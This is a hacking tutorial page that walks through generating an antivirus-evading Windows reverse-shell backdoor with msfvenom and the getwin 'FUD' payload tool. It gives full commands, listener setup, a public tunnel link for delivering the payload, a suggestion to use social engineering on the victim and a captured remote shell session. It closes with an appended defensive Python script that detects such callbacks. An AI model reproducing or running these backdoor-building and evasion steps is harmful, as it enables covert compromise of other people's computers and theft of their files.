How to Create a Nearly Undetectable Backdoor using MSFvenom in Kali Linux

A backdoor is used to bypass security mechanisms, often secretly and mostly undetectably. Using MSFvenom, the combination of the old msfpayload and msfencode tools, it is possible to create a backdoor that connects back to the attacker over a reverse TCP shell. To develop such a backdoor, you need to change the signature of your malware so that antivirus software does not recognize it. Complete this project on a pair of computers that you have permission to access; in the process you will learn more about computer security and how this kind of backdoor works.

Steps

1. Start up Kali and open a Terminal console.

2. Type ifconfig to display the interfaces and check your IP address.

3. Type msfvenom -l encoders to show the list of encoders. You will use x86/shikata_ga_nai as the encoder.

4. Type the following (the whole command on one line):
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.48.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe > helloWorld.exe
- -a x86 --platform windows designates the architecture and platform to use.
- -p windows/shell/reverse_tcp designates the payload to embed.
- LHOST designates the listener IP address (no spaces around the = sign).
- LPORT designates the listener port.
- -b "\x00" designates the bad characters to avoid (here the null byte).
- -e x86/shikata_ga_nai designates the encoder name.
- -f exe > helloWorld.exe designates the output format and file (here you can also generate MSI files and other executables).

5. Type msfconsole to start Metasploit.
Now you have generated your backdoor. When the victim runs helloWorld.exe, the embedded shell payload is activated and makes a connection back to your system. To receive the connection, you have to open the multi-handler in Metasploit and set the payload.

6. Type use exploit/multi/handler

7. Type set payload windows/shell/reverse_tcp

8. Type show options

9. Type set LHOST 192.168.48.129 (the local IP of the Kali machine)

10. Type set LPORT 4444 (the desired port)

11. Type run and wait for the victim to connect.

Test this on Windows and check how antivirus products detect it.

Try the following:

A Windows shell is what every hacker loves. There are various Windows payloads designed to bypass the Windows OS security mechanisms. According to an ethical hacking researcher at the International Institute of Cyber Security, these payloads are well coded to obtain sessions on Windows OS. There are many different ways of getting a reverse shell. Today we will show the getwin tool, which is used to create a Win32 payload and listener.

The payload generated by this tool is FUD (fully undetectable) by Windows 10 Defender. Do not upload the generated payload to virustotal.com.

- For testing purposes, on the attacker side we will use Kali Linux 2018.4 amd64 and on the victim side we will use Windows 10 1809.
- Open a terminal and type git clone https://github.com/thelinuxchoice/getwin.git
- Then type cd getwin and chmod u+x getwin.sh

root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/thelinuxchoice/getwin.git
Cloning into 'getwin'…
remote: Enumerating objects: 46, done.
remote: Total 46 (delta 0), reused 0 (delta 0), pack-reused 46
Unpacking objects: 100% (46/46), done.
root@kali:/home/iicybersecurity/Downloads# cd getwin/
root@kali:/home/iicybersecurity/Downloads/getwin# chmod u+x getwin.sh
root@kali:/home/iicybersecurity/Downloads/getwin# ls
getwin.sh  icon  LICENSE  README.md

- Type ./getwin.sh

root@kali:/home/iicybersecurity/Downloads/getwin# ./getwin.sh
[getwin v1.2 ASCII-art banner]
.:.: FUD win32 payload generator and listener :.:.
.:.: Coded by:@linux_choice :.:.
:: Warning: Attacking targets without ::
:: prior mutual consent is illegal! ::
- After the tool has started, press Enter to accept the default port. Then enter the payload name (test01) and select the icon.

[*] Choose a Port (Default: 4098 ):
[*] Payload name (Default: payload ): test01
[*] Put ICON path (Default: icon/messenger.ico ):
[*] Compiling…
[*] Saved: test01.exe
[!] Please, don't upload to virustotal.com !
[*] Starting server…
[*] Send the first link above to target + /test01.exe:
Forwarding HTTP traffic from https://ludius.serveo.net
Forwarding TCP connections from serveo.net:2119
[*] Waiting connection…
listening on [any] 1547 …

- As you can see, the listener has started. Now you can use any social engineering trick to execute the payload on the victim's computer.
- For testing we will use Windows 10 1809 with Windows Defender enabled.
- So now we will execute the payload on the Windows 10 OS.
- After creating the payload (test01.exe), execute it by simply double-clicking the executable.
- As soon as you double-click the payload (test01.exe), a session is created between the victim and the attacker's machine and you get a Windows shell.
- Tools like this are part of the ethical hacking courses offered by the International Institute of Cyber Security.

Do not upload the generated payload to virustotal.com.

[*] Waiting connection…
listening on [any] 4342 …
connect to [127.0.0.1] from localhost [127.0.0.1] 43878
TCP connection from 27.4.174.190 on port 3352
Microsoft Windows [Version 10.0.17758.1]
(c) 2018 Microsoft Corporation. All rights reserved.

E:\>C:
C:

C:\>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::c947:1c34:3f73:be30%13
   IPv4 Address. . . . . . . . . . . : 192.168.1.5
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::1%13
                                       192.168.1.1

C:\>getmac
getmac

Physical Address    Transport Name
=================== ==========================================================
##-##-##-E8-##-##   \Device\Tcpip_{F237F6ED-8EC9-42C1-93F8-E95EDB31D7FC}

(For security reasons we have hidden the MAC address.)

- Now the attacker can view or change any file on the target's Windows 10 computer.
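As a defensive counterpart to the two walkthroughs above (the msfvenom reverse_tcp backdoor and the getwin listener), here is an added example that is not part of the original page: a small Python checker that correlates constructed Sysmon-style process-creation and network-connection events and flags a process started from a user-writable directory that calls out to an unexpected port right after launch, which is exactly how the reverse_tcp stager behaves. The event fields, the sample values, the port allowlist and the 30-second window are assumptions chosen for the illustration; the callback address and port are the ones used in step 4.

```python
import json
from datetime import datetime, timedelta

# Constructed Sysmon-style events as JSON lines (not real logs). EventID 1 is
# process creation, EventID 3 an outbound network connection. The first pair
# mirrors the walkthrough above (helloWorld.exe calling back to
# 192.168.48.129:4444); the chrome.exe pair is benign browser traffic.
SAMPLE_EVENTS = r"""
{"EventID": 1, "UtcTime": "2024-01-01 10:00:00", "ProcessGuid": "{A}", "Image": "C:\\Users\\bob\\Downloads\\helloWorld.exe"}
{"EventID": 3, "UtcTime": "2024-01-01 10:00:02", "ProcessGuid": "{A}", "Image": "C:\\Users\\bob\\Downloads\\helloWorld.exe", "Initiated": true, "DestinationIp": "192.168.48.129", "DestinationPort": 4444}
{"EventID": 1, "UtcTime": "2024-01-01 10:05:00", "ProcessGuid": "{B}", "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"}
{"EventID": 3, "UtcTime": "2024-01-01 10:05:01", "ProcessGuid": "{B}", "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "Initiated": true, "DestinationIp": "142.250.74.36", "DestinationPort": 443}
"""

# Directories an unprivileged user can write to; a freshly dropped payload
# such as helloWorld.exe or test01.exe usually runs from one of them.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")
# Ports on which an outbound connection from a brand-new process is expected.
EXPECTED_PORTS = {80, 443}

def parse_events(text):
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]

def runs_from_user_writable(image):
    return any(frag in image.lower() for frag in USER_WRITABLE)

def find_reverse_shell_candidates(events, window=timedelta(seconds=30)):
    """Return (image, dst_ip, dst_port) for every process that started from a
    user-writable path and initiated a connection to an unexpected port within
    `window` of its creation: the footprint of the reverse_tcp stager above."""
    fmt = "%Y-%m-%d %H:%M:%S"
    created = {e["ProcessGuid"]: datetime.strptime(e["UtcTime"], fmt)
               for e in events if e["EventID"] == 1}
    hits = []
    for e in events:
        if e["EventID"] != 3 or not e.get("Initiated"):
            continue
        start = created.get(e["ProcessGuid"])
        if start is None or not runs_from_user_writable(e["Image"]):
            continue
        when = datetime.strptime(e["UtcTime"], fmt)
        if when - start <= window and e["DestinationPort"] not in EXPECTED_PORTS:
            hits.append((e["Image"], e["DestinationIp"], e["DestinationPort"]))
    return hits

if __name__ == "__main__":
    for image, ip, port in find_reverse_shell_candidates(parse_events(SAMPLE_EVENTS)):
        print(f"ALERT: {image} connected to {ip}:{port} shortly after starting")
```

The same rule catches the getwin variant, whose payload calls out to a serveo.net forwarding port rather than 4444, because it keys on the behaviour (new binary in a user directory making an early outbound connection) rather than on a fixed port.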